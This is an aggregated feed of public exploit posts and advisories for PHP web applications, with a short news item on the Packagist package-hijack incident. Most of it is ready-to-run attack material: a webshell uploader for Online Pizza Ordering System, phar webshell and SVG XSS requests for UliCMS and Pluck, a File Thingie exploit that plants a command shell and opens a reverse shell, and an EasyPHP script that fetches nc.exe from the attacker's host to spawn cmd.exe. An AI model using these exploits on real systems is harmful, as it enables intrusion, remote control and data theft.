Online Pizza Ordering System version 1.0 suffers from an unauthenticated remote shell upload vulnerability.

    # Exploit Title: Online Pizza Ordering System 1.0 - Unauthenticated File Upload# Date: 03/05/2023# Exploit Author: URGAN # Vendor Homepage: https://www.sourcecodester.com/php/16166/online-pizza-ordering-system-php-free-source-code.html# Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/php-opos.zip# Version: v1.0# Tested on: LAMP Fedora Server 27 (Twenty Seven) Apache/2.4.34 (Fedora) 10.2.19-MariaDB PHP 7.1.23 # CVE: CVE-2023-2246#!/usr/bin/env python3# coding: utf-8import osimport requestsimport argparsefrom bs4 import BeautifulSoup# command line argumentsparser = argparse.ArgumentParser()parser.add_argument('-u', '--url', type=str, help='URL with http://')parser.add_argument('-p', '--payload', type=str, help='PHP webshell')args = parser.parse_args()# if no arguments are passed, ask the user for themif not (args.url and args.payload):    args.url = input('Enter URL with http://: ')    args.payload = input('Enter file path PHP webshell: ')# URL Variablesurl = args.url + '/admin/ajax.php?action=save_settings'img_url = args.url + '/assets/img/'filename = os.path.basename(args.payload)files = [  ('img',(filename,open(args.payload,'rb'),'application/octet-stream'))]# send a POST request to the serverresp_upl = requests.post(url, files = files)status_code = resp_upl.status_codeif status_code == 200:    print('[+] File uploaded')else:    print(f'[-] Error {status_code}: {resp_upl.text}')    raise SystemExit(f'[-] Script stopped due to error {status_code}.')# send a GET request to the serverresp_find = requests.get(img_url)# Use BeautifulSoup to parse the page's HTML codesoup = BeautifulSoup(resp_find.text, 'html.parser')# get all <a> tags on a pagelinks = soup.find_all('a')# list to store found filesfound_files = []# we go through all the links and look for the desired file by its namefor link in links:    file_upl = link.get('href')    if file_upl.endswith(filename): # uploaded file name        print('[+] Uploaded file found:', file_upl)        file_url = img_url + file_upl # get the full URL of your file        found_files.append(file_url) # add the file to the list of found files# if the list is not empty, then display all found filesif found_files:    print('[+] Full URL of your file:')    for file_url in found_files:        print('[+] ' + file_url)else:    print('[-] File not found')

Online Pizza Ordering System 1.0 Shell Upload

UliCMS version 2023-1 Sniffing-Vicuna suffers from a remote shell upload vulnerability.

#Exploit Title: Ulicms-2023.1 sniffing-vicuna - Remote Code Execution (RCE)  
#Application: Ulicms  
#Version: 2023.1-sniffing-vicuna  
#Bugs:  RCE  
#Technology: PHP  
#Vendor URL: https://en.ulicms.de/  
#Software Link: https://www.ulicms.de/content/files/Releases/2023.1/ulicms-2023.1-sniffing-vicuna-full.zip  
#Date of found: 04-05-2023  
#Author: Mirabbas Ağalarov  
#Tested on: Linux 

2. Technical Details & POC  
========================================  
steps: 

1. Login to account and edit profile.

2.Upload new Avatar

3. It is possible to include the php file with the phar extension when uploading the image. Rce is triggered when we visit it again. File upload error may occur, but this does not mean that the file is not uploaded and the file location is shown in the error

payload: <?php echo system("cat /etc/passwd"); ?>

poc request :

POST /dist/admin/index.php HTTP/1.1  
Host: localhost  
Content-Length: 1982  
Cache-Control: max-age=0  
sec-ch-ua: "Not?A_Brand";v="8", "Chromium";v="108"  
sec-ch-ua-mobile: ?0  
sec-ch-ua-platform: "Linux"  
Upgrade-Insecure-Requests: 1  
Origin: http://localhost  
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryYB7QS1BMMo1CXZVy  
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.5359.125 Safari/537.36  
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9  
Sec-Fetch-Site: same-origin  
Sec-Fetch-Mode: navigate  
Sec-Fetch-User: ?1  
Sec-Fetch-Dest: document  
Referer: http://localhost/dist/admin/index.php?action=admin_edit&id=12&ref=home  
Accept-Encoding: gzip, deflate  
Accept-Language: en-US,en;q=0.9  
Cookie: 64534366316f0_SESSION=g9vdeh7uafdagkn6l8jdk2delv  
Connection: close

------WebKitFormBoundaryYB7QS1BMMo1CXZVy  
Content-Disposition: form-data; name="csrf_token"

e2d428bc0585c06c651ca8b51b72fa58  
------WebKitFormBoundaryYB7QS1BMMo1CXZVy  
Content-Disposition: form-data; name="sClass"

UserController  
------WebKitFormBoundaryYB7QS1BMMo1CXZVy  
Content-Disposition: form-data; name="sMethod"

update  
------WebKitFormBoundaryYB7QS1BMMo1CXZVy  
Content-Disposition: form-data; name="avatar"; filename="salam.phar"  
Content-Type: application/octet-stream

<?php echo system("cat /etc/passwd"); ?>

------WebKitFormBoundaryYB7QS1BMMo1CXZVy  
Content-Disposition: form-data; name="edit_admin"

edit_admin  
------WebKitFormBoundaryYB7QS1BMMo1CXZVy  
Content-Disposition: form-data; name="id"

12  
------WebKitFormBoundaryYB7QS1BMMo1CXZVy  
Content-Disposition: form-data; name="firstname"

account1  
------WebKitFormBoundaryYB7QS1BMMo1CXZVy  
Content-Disposition: form-data; name="lastname"

account1  
------WebKitFormBoundaryYB7QS1BMMo1CXZVy  
Content-Disposition: form-data; name="email"

account1@test.com  
------WebKitFormBoundaryYB7QS1BMMo1CXZVy  
Content-Disposition: form-data; name="password"

------WebKitFormBoundaryYB7QS1BMMo1CXZVy  
Content-Disposition: form-data; name="password_repeat"

------WebKitFormBoundaryYB7QS1BMMo1CXZVy  
Content-Disposition: form-data; name="group_id"

1  
------WebKitFormBoundaryYB7QS1BMMo1CXZVy  
Content-Disposition: form-data; name="secondary_groups[]"

1  
------WebKitFormBoundaryYB7QS1BMMo1CXZVy  
Content-Disposition: form-data; name="homepage"

------WebKitFormBoundaryYB7QS1BMMo1CXZVy  
Content-Disposition: form-data; name="html_editor"

ckeditor  
------WebKitFormBoundaryYB7QS1BMMo1CXZVy  
Content-Disposition: form-data; name="admin"

1  
------WebKitFormBoundaryYB7QS1BMMo1CXZVy  
Content-Disposition: form-data; name="default_language"

------WebKitFormBoundaryYB7QS1BMMo1CXZVy  
Content-Disposition: form-data; name="about_me"

------WebKitFormBoundaryYB7QS1BMMo1CXZVy--

response:

Error  
GmagickException: No decode delegate for this image format (/var/www/html/dist/content/tmp/645364e62615b.phar) in /var/www/html/dist/vendor/imagine/imagine/src/Gmagick/Imagine.php:67  
Stack trace:  
#0 /var/www/html/dist/vendor/imagine/imagine/src/Gmagick/Imagine.php(67): Gmagick->__construct()  
#1 /var/www/html/dist/App/non_namespaced/User.php(1110): Imagine\Gmagick\Imagine->open()  
#2 /var/www/html/dist/App/non_namespaced/User.php(1089): User->processAvatar()  
#3 /var/www/html/dist/content/modules/core_users/controllers/UserController.php(124): User->changeAvatar()  
#4 /var/www/html/dist/App/non_namespaced/Controller.php(82): UserController->updatePost()  
#5 /var/www/html/dist/App/non_namespaced/ControllerRegistry.php(67): Controller->runCommand()  
#6 /var/www/html/dist/admin/index.php(66): ControllerRegistry::runMethods()  
#7 {main}

Next Imagine\Exception\RuntimeException: Unable to open image /var/www/html/dist/content/tmp/645364e62615b.phar in /var/www/html/dist/vendor/imagine/imagine/src/Gmagick/Imagine.php:73  
Stack trace:  
#0 /var/www/html/dist/App/non_namespaced/User.php(1110): Imagine\Gmagick\Imagine->open()  
#1 /var/www/html/dist/App/non_namespaced/User.php(1089): User->processAvatar()  
#2 /var/www/html/dist/content/modules/core_users/controllers/UserController.php(124): User->changeAvatar()  
#3 /var/www/html/dist/App/non_namespaced/Controller.php(82): UserController->updatePost()  
#4 /var/www/html/dist/App/non_namespaced/ControllerRegistry.php(67): Controller->runCommand()  
#5 /var/www/html/dist/admin/index.php(66): ControllerRegistry::runMethods()  
#6 {main}

4. Go to /var/www/html/dist/content/tmp/645364e62615b.phar (http://localhost/dist/content/tmp/645364e62615b.phar)

UliCMS 2023-1 Sniffing-Vicuna Shell Upload

UliCMS version 2023-1 Sniffing-Vicuna suffers from a persistent cross site scripting vulnerability.

    #Exploit Title: Ulicms-2023.1 sniffing-vicuna - Stored Cross-Site Scripting (XSS)#Application: Ulicms#Version: 2023.1-sniffing-vicuna#Bugs:  Stored Xss#Technology: PHP#Vendor URL: https://en.ulicms.de/#Software Link: https://www.ulicms.de/content/files/Releases/2023.1/ulicms-2023.1-sniffing-vicuna-full.zip#Date of found: 04-05-2023#Author: Mirabbas Ağalarov#Tested on: Linux 2. Technical Details & POC========================================steps: 1. Go to media then to file (http://localhost/dist/admin/index.php?action=files)2. upload malicious svg filesvg file content ===><?xml version="1.0" standalone="no"?><!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd"><svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg">   <polygon id="triangle" points="0,0 0,50 50,0" fill="#009900" stroke="#004400"/>   <script type="text/javascript">      alert(document.location);   </script></svg>poc request:POST /dist/admin/fm/upload.php HTTP/1.1Host: localhostContent-Length: 663sec-ch-ua: "Not?A_Brand";v="8", "Chromium";v="108"Accept: application/json, text/javascript, */*; q=0.01Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryK3CvcSs8xZwzABClX-Requested-With: XMLHttpRequestsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.5359.125 Safari/537.36sec-ch-ua-platform: "Linux"Origin: http://localhostSec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: http://localhost/dist/admin/fm/dialog.phpAccept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.9Cookie: last_position=%2F; 64534366316f0_SESSION=g9vdeh7uafdagkn6l8jdk2delvConnection: close------WebKitFormBoundaryK3CvcSs8xZwzABClContent-Disposition: form-data; name="fldr"------WebKitFormBoundaryK3CvcSs8xZwzABClContent-Disposition: form-data; name="files[]"; filename="SVG_XSS.svg"Content-Type: image/svg+xml<?xml version="1.0" standalone="no"?><!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd"><svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg">   <polygon id="triangle" points="0,0 0,50 50,0" fill="#009900" stroke="#004400"/>   <script type="text/javascript">      alert(document.location);   </script></svg>------WebKitFormBoundaryK3CvcSs8xZwzABCl--3. Go to http://localhost/dist/content/SVG_XSS.svg

UliCMS 2023-1 Sniffing-Vicuna Cross Site Scripting

File Thingie version 2.5.7 remote shell upload exploit. This exploit is based on the vulnerability priorly discovered by Cakes in September of 2019.

    #!/usr/bin/python# Exploit Title: File Thingie 2.5.7 - Remote Code Execution (RCE)# Google Dork: N/A# Date: 27th of April, 2023# Exploit Author: Maurice Fielenbach (grimlockx) - Hexastrike Cybersecurity UG (haftungsbeschränkt)# Software Link: https://github.com/leefish/filethingie# Version: 2.5.7# Tested on: N/A# CVE: N/A# Vulnerability originally discovered / published by Cakes# Reference: https://www.exploit-db.com/exploits/47349# Run a local listener on your machine and youre good to goimport osimport argparseimport requestsimport randomimport stringimport zipfilefrom urllib.parse import urlsplit, urlunsplit, quoteclass Exploit:    def __init__(self, target, username, password, lhost, lport):        self.target = target        self.username = username        self.password = password        self.lhost = lhost        self.lport = lport    def try_login(self) -> bool:        self.session = requests.Session()        post_body = {"ft_user": f"{self.username}", "ft_pass": f"{self.password}", "act": "dologin"}        response = self.session.post(self.target, data=post_body)        if response.status_code == 404:            print(f"[-] 404 Not Found - The requested resource {self.target} was not found")            return False        elif response.status_code == 200:            if "Invalid username or password" in response.text:                print(f"Invalid username or password")                return False            return True            def create_new_folder(self) -> bool:        # Generate random string        letters = string.ascii_letters        self.payload_filename = "".join(random.choice(letters) for i in range(16))        headers = {"Content-Type": "application/x-www-form-urlencoded"}        post_body = {f"type": "folder", "newdir": f"{self.payload_filename}", "act": "createdir", "dir": "", "submit" :"Ok"}        print(f"[*] Creating new folder /{self.payload_filename}")        response = self.session.post(self.target, headers=headers, data=post_body)        if f"index.php?dir=/{self.payload_filename}" in response.text:            print(f"[+] Created new folder /{self.payload_filename}")            return True                else:            print(f"[-] Could not create new folder /{self.payload_filename}")            return False    def create_payload(self) -> bool:        try:            with zipfile.ZipFile(f"{self.payload_filename}.zip", 'w', compression=zipfile.ZIP_DEFLATED) as zip_file:                    zip_file.writestr(f"{self.payload_filename}.php", "<?php if(isset($_REQUEST[\'cmd\'])){ echo \"<pre>\"; $cmd = ($_REQUEST[\'cmd\']); system($cmd); echo \"</pre>\"; die; }?>")                    print(f"[+] Zipped payload to {self.payload_filename}.zip")                    return True        except:            print(f"[-] Could not create payload to {self.payload_filename}.zip")            return False    def upload_payload(self) -> bool:        # Set up the HTTP headers and data for the request        headers = {            b'Content-Type': b'multipart/form-data; boundary=---------------------------grimlockx'        }        post_body = (            '-----------------------------grimlockx\r\n'            'Content-Disposition: form-data; name="localfile-1682513975953"; filename=""\r\n'            'Content-Type: application/octet-stream\r\n\r\n'        )        post_body += (            '\r\n-----------------------------grimlockx\r\n'            'Content-Disposition: form-data; name="MAX_FILE_SIZE"\r\n\r\n'            '2000000\r\n'            '-----------------------------grimlockx\r\n'            f'Content-Disposition: form-data; name="localfile"; filename="{self.payload_filename}.zip"\r\n'            'Content-Type: application/zip\r\n\r\n'        )        # Read the zip file contents and append them to the data        with open(f"{self.payload_filename}.zip", "rb") as f:            post_body += ''.join(map(chr, f.read()))        post_body += (            '\r\n-----------------------------grimlockx\r\n'            'Content-Disposition: form-data; name="act"\r\n\r\n'            'upload\r\n'            '-----------------------------grimlockx\r\n'            'Content-Disposition: form-data; name="dir"\r\n\r\n'            f'/{self.payload_filename}\r\n'            '-----------------------------grimlockx\r\n'            'Content-Disposition: form-data; name="submit"\r\n\r\n'            'Upload\r\n'            '-----------------------------grimlockx--\r\n'        )        print("[*] Uploading payload to the target")        response = self.session.post(self.target, headers=headers, data=post_body)        if f"<a href=\"./{self.payload_filename}/{self.payload_filename}.zip\" title=\"Show {self.payload_filename}.zip\">{self.payload_filename}.zip</a>" in response.text:            print("[+] Uploading payload successful")            return True        else:             print("[-] Uploading payload failed")            return False            def get_base_url(self) -> str:        url_parts = urlsplit(self.target)        path_parts = url_parts.path.split('/')        path_parts.pop()        base_url = urlunsplit((url_parts.scheme, url_parts.netloc, '/'.join(path_parts), "", ""))        return base_url    def unzip_payload(self) -> bool:        print("[*] Unzipping payload")        headers = {"Content-Type": "application/x-www-form-urlencoded"}        post_body = {"newvalue": f"{self.payload_filename}.zip", "file": f"{self.payload_filename}.zip", "dir": f"/{self.payload_filename}", "act": "unzip"}        response = self.session.post(f"{self.target}", headers=headers, data=post_body)                if f"<p class='ok'>{self.payload_filename}.zip unzipped.</p>" in response.text:            print("[+] Unzipping payload successful")            print(f"[+] You can now execute commands by opening {self.get_base_url()}/{self.payload_filename}/{self.payload_filename}.php?cmd=<command>")            return True        else:             print("[-] Unzipping payload failed")            return False    def execute_payload(self) -> bool:        print("[*] Trying the get a reverse shell")        cmd = quote(f"php -r \'$sock=fsockopen(\"{self.lhost}\",{self.lport});system(\"/bin/bash <&3 >&3 2>&3\");\'")        print("[*] Executing payload")        response = self.session.get(f"{self.get_base_url()}/{self.payload_filename}/{self.payload_filename}.php?cmd={cmd}")        print("[+] Exploit complete")                return True    def cleanup_local_files(self) -> bool:        if os.path.exists(f"{self.payload_filename}.zip"):            os.remove(f"{self.payload_filename}.zip")            print("[+] Cleaned up zipped payload on local machine")            return True                print("[-] Could not clean up zipped payload on local machine")        return Falseif __name__ == "__main__":    parser = argparse.ArgumentParser()    parser.add_argument("-t", "--target", dest="target", type=str, required=True, help="Target URL to ft2.php")    parser.add_argument("-u", "--username", dest="username", type=str, required=True, help="FileThingie username")    parser.add_argument("-p", "--password", dest="password", type=str, required=True, help="FileThingie password")    parser.add_argument("-L", "--LHOST", dest="lhost", type=str, required=True, help="Local listener ip")    parser.add_argument("-P", "-LPORT", dest="lport", type=int, required=True, help="Local listener port")    args = parser.parse_args()    exploit = Exploit(args.target, args.username, args.password, args.lhost, args.lport)    exploit.try_login()    exploit.create_new_folder()    exploit.create_payload()    exploit.upload_payload()    exploit.unzip_payload()    exploit.execute_payload()    exploit.cleanup_local_files()

File Thingie 2.5.7 Shell Upload

Wolf CMS version 0.8.3.1 suffers from a remote shell upload vulnerability.

    # Exploit Title: Wolf CMS 0.8.3.1 - Remote Code Execution (RCE)# Date: 2023-05-02# Exploit Author: Ahmet Ümit BAYRAM# Vendor Homepage: https://wolf-cms.readthedocs.io# Software Link: https://github.com/wolfcms/wolfcms# Version: 0.8.3.1# Tested on: Kali Linux### Steps to Reproduce #### Firstly, go to the "Files" tab.# Click on the "Create new file" button and create a php file (e.g:shell.php)# Then, click on the file you created to edit it.# Now, enter your shell code and save the file.# Finally, go to https://localhost/wolfcms/public/shell.php### There's your shell! ###

Wolf CMS 0.8.3.1 Shell Upload

Pluck CMS version 4.7.18 suffers from a persistent cross site scripting vulnerability.

    Exploit Title: pluck v4.7.18 - Stored Cross-Site Scripting (XSS)Application: pluckVersion: 4.7.18Bugs:  XSSTechnology: PHPVendor URL: https://github.com/pluck-cms/pluckSoftware Link: https://github.com/pluck-cms/pluckDate of found: 01-05-2023Author: Mirabbas AğalarovTested on: Linux 2. Technical Details & POC========================================steps: 1. create .svg file.2. svg file content:<?xml version="1.0" standalone="no"?><!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd"><svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg">   <polygon id="triangle" points="0,0 0,50 50,0" fill="#009900" stroke="#004400"/>   <script type="text/javascript">      alert(document.location);   </script></svg>3. upload file (http://localhost/pluck-4.7.18/admin.php?action=files)poc requestPOST /pluck-4.7.18/admin.php?action=files HTTP/1.1Host: localhostContent-Length: 672Cache-Control: max-age=0sec-ch-ua: "Not?A_Brand";v="8", "Chromium";v="108"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Linux"Upgrade-Insecure-Requests: 1Origin: http://localhostContent-Type: multipart/form-data; boundary=----WebKitFormBoundaryJMTiFxESCx7aNqmIUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.5359.125 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9Sec-Fetch-Site: same-originSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentReferer: http://localhost/pluck-4.7.18/admin.php?action=filesAccept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.9Cookie: PHPSESSID=s34g5lr0qg5m4qh0ph5plmo8deConnection: close------WebKitFormBoundaryJMTiFxESCx7aNqmIContent-Disposition: form-data; name="filefile"; filename="SVG_XSS.svg"Content-Type: image/svg+xml<?xml version="1.0" standalone="no"?><!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd"><svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg">   <polygon id="triangle" points="0,0 0,50 50,0" fill="#009900" stroke="#004400"/>   <script type="text/javascript">      alert(document.location);   </script></svg>------WebKitFormBoundaryJMTiFxESCx7aNqmIContent-Disposition: form-data; name="submit"Upload------WebKitFormBoundaryJMTiFxESCx7aNqmI--4. go to http://localhost/pluck-4.7.18/files/svg_xss.svg

Pluck CMS 4.7.18 Cross Site Scripting

EasyPHP Webserver version 14.1 suffers from remote code execution and path traversal vulnerabilities.

# Exploit Title: EasyPHP Webserver 14.1 - Multiple Vulnerabilities (RCE and  
Path Traversal)  
# Discovery by: Rafael Pedrero  
# Discovery Date: 2022-02-06  
# Vendor Homepage: https://www.easyphp.org/  
# Software Link : https://www.easyphp.org/  
# Tested Version: 14.1  
# Tested on:  Windows 7 and 10

# Vulnerability Type: Remote Command Execution (RCE)

CVSS v3: 9.8  
CVSS vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H  
CWE: CWE-78

Vulnerability description: There is an OS Command Injection in EasyPHP  
Webserver 14.1 that allows an attacker to achieve Remote Code Execution  
(RCE) with administrative privileges.

Proof of concept:

To detect:

POST http://127.0.0.1:10000/index.php?zone=settings HTTP/1.1  
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:70.0)  
Gecko/20100101 Firefox/70.0  
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8  
Accept-Language: es-ES,es;q=0.8,en-US;q=0.5,en;q=0.3  
Content-Type: application/x-www-form-urlencoded  
Content-Length: 28  
Origin: http://127.0.0.1:10000  
Connection: keep-alive  
Referer: http://127.0.0.1:10000/index.php?zone=settings  
Host: 127.0.0.1:10000

app_service_control=calc.exe

The calculator opens.

Exploit:

# !/usr/bin/python3  
import requests  
import sys

if len(sys.argv) != 5:  
    print("RCE: EasyPHP Webserver 14.1 and before - by Rafa")  
    print("Usage:   %s <TARGET> <TARGET_PORT> <LOCAL_IP> <LOCAL_PORT>" %  
sys.argv[0])  
    print("Example:   %s 192.168.1.10 10000 192.168.1.11 9001" %  
sys.argv[0])  
    exit(1)

else:  
    target = sys.argv[1]  
    targetport = sys.argv[2]  
    localip = sys.argv[3]  
    localport = sys.argv[4]  
    # python3 -m http.server / python2 -m SimpleHTTPServer with nc.exe in  
the directory

    payload =  
"powershell+-command+\"((new-object+System.Net.WebClient).DownloadFile('http://"  
+ localip + ':8000' +  
"/nc.exe','%TEMP%\\nc.exe'))\";\"c:\windows\\system32\\cmd.exe+/c+%TEMP%\\nc.exe+"  
+ localip + "+" + localport + "+-e+cmd.exe\""  
    print (payload)  
    url = 'http://' + target + ':' + targetport + '/index.php?zone=settings'  
    headers = {  
        "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64)  
AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4433.0 Safari/537.36"  
    }  
    data = {'app_service_control':payload}

    try:  
        r = requests.post(url, headers=headers, data=data)  
    except requests.exceptions.ReadTimeout:  
        print("The payload has been sent. Check it!")  
        pass

# Vulnerability Type: Path Traversal

CVSS v3: 6.5  
CVSS vector: 3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N  
CWE: CWE-22

Vulnerability description: An issue was discovered in EasyPHP Webserver  
14.1. An Absolute Path Traversal vulnerability in / allows remote users to  
bypass intended SecurityManager restrictions and download any file if you  
have adequate permissions outside the documentroot configured on the server.

Proof of concept:

GET /..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c/windows/win.ini  
HTTP/1.1  
Host: 192.168.X.X:10000  
Connection: Keep-alive  
Accept-Encoding: gzip,deflate  
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML,  
like Gecko) Chrome/41.0.2228.0 Safari/537.21  
Accept: */*

HTTP/1.1 200 OK  
Host: 192.168.X.X:10000  
Connection: close  
Content-Type: application/octet-stream  
Content-Length: 499

; for 16-bit app support [fonts] [extensions] [mci extensions] [files]  
[Mail] MAPI=1 CMCDLLNAME32=mapi32.dll CMCDLLNAME=mapi.dll CMC=1 MAPIX=1  
MAPIXVER=1.0.0.1 OLEMessaging=1 [MCI Extensions.BAK] 3g2=MPEGVideo  
3gp=MPEGVideo 3gp2=MPEGVideo 3gpp=MPEGVideo aac=MPEGVideo adt=MPEGVideo  
adts=MPEGVideo m2t=MPEGVideo m2ts=MPEGVideo m2v=MPEGVideo m4a=MPEGVideo  
m4v=MPEGVideo mod=MPEGVideo mov=MPEGVideo mp4=MPEGVideo mp4v=MPEGVideo  
mts=MPEGVideo ts=MPEGVideo tts=MPEGVideo

EasyPHP Webserver 14.1 Path Traversal / Remote Code Execution

NS-ASG v6.3 was discovered to contain a SQL injection vulnerability via the component /admin/add_ikev2.php.

CVE-2023-30242

PHP software package repository Packagist revealed that an "attacker" gained access to four inactive accounts on the platform to hijack over a dozen packages with over 500 million installs to date.
"The attacker forked each of the packages and replaced the package description in composer.json with their own message but did not otherwise make any malicious changes," Packagist's Nils Adermann said

Programming / Software Security

PHP software package repository Packagist revealed that an "attacker" gained access to four inactive accounts on the platform to hijack over a dozen packages with over 500 million installs to date.

"The attacker forked each of the packages and replaced the package description in composer.json with their own message but did not otherwise make any malicious changes," Packagist's Nils Adermann said. "The package URLs were then changed to point to the forked repositories."

The four user accounts are said to have had access to a total of 14 packages, including multiple Doctrine packages. The incident took place on May 1, 2023. The complete list of impacted packages is as follows -

*   acmephp/acmephp
*   acmephp/core
*   acmephp/ssl
*   doctrine/doctrine-cache-bundle
*   doctrine/doctrine-module
*   doctrine/doctrine-mongo-odm-module
*   doctrine/doctrine-orm-module
*   doctrine/instantiator
*   growthbook/growthbook
*   jdorn/file-system-cache
*   jdorn/sql-formatter
*   khanamiryan/qrcode-detector-decoder
*   object-calisthenics/phpcs-calisthenics-rules
*   tga/simhash-php

Security researcher Ax Sharma, writing for Bleeping Computer, revealed that the changes were made by an anonymous penetration tester with the pseudonym "neskafe3v1" in an attempt to land a job.

The attack chain, in a nutshell, made it possible to modify the Packagist page for each of these packages to a namesake GitHub repository, effectively altering the installation workflow used within Composer environments.

Successful exploitation meant that developers downloading the packages would get the forked version as opposed to the actual contents.

Packagist said that no additional malicious changes were distributed, and that all the accounts were disabled and their packages restored on May 2, 2023. It's also urging users to enable two-factor authentication (2FA) to secure their accounts.

"All four accounts appear to have been using shared passwords leaked in previous incidents on other platforms," Adermann noted. "Please, do not reuse passwords."

The development comes as cloud security firm Aqua identified thousands of exposed cloud software registries and repositories containing more than 250 million artifacts and over 65,000 container images.

The misconfigurations stem from mistakenly connecting registries to the internet, allowing anonymous access by design, using default passwords, and granting upload privileges to users that could be abused to poison the registry with malicious code.

"In some of these cases, anonymous user access allowed a potential attacker to gain sensitive information, such as secrets, keys, and passwords, which could lead to a severe software supply chain attack and poisoning of the software development life cycle (SDLC)," researchers Mor Weinberger and Assaf Morag disclosed late last month.

Found this article interesting? Follow us on Twitter __ and LinkedIn to read more exclusive content we post.

Packagist Repository Hacked: Over a Dozen PHP Packages with 500 Million Compromised

Semcms Shop v4.2 was discovered to contain an arbitrary file uplaod vulnerability via the component SEMCMS_Upfile.php. This vulnerability allows attackers to execute arbitrary code via uploading a crafted PHP file.

A tag already exists with the provided branch name. Many Git commands accept both tag and branch names, so creating this branch may cause unexpected behavior. Are you sure you want to create this branch?

Tag

#php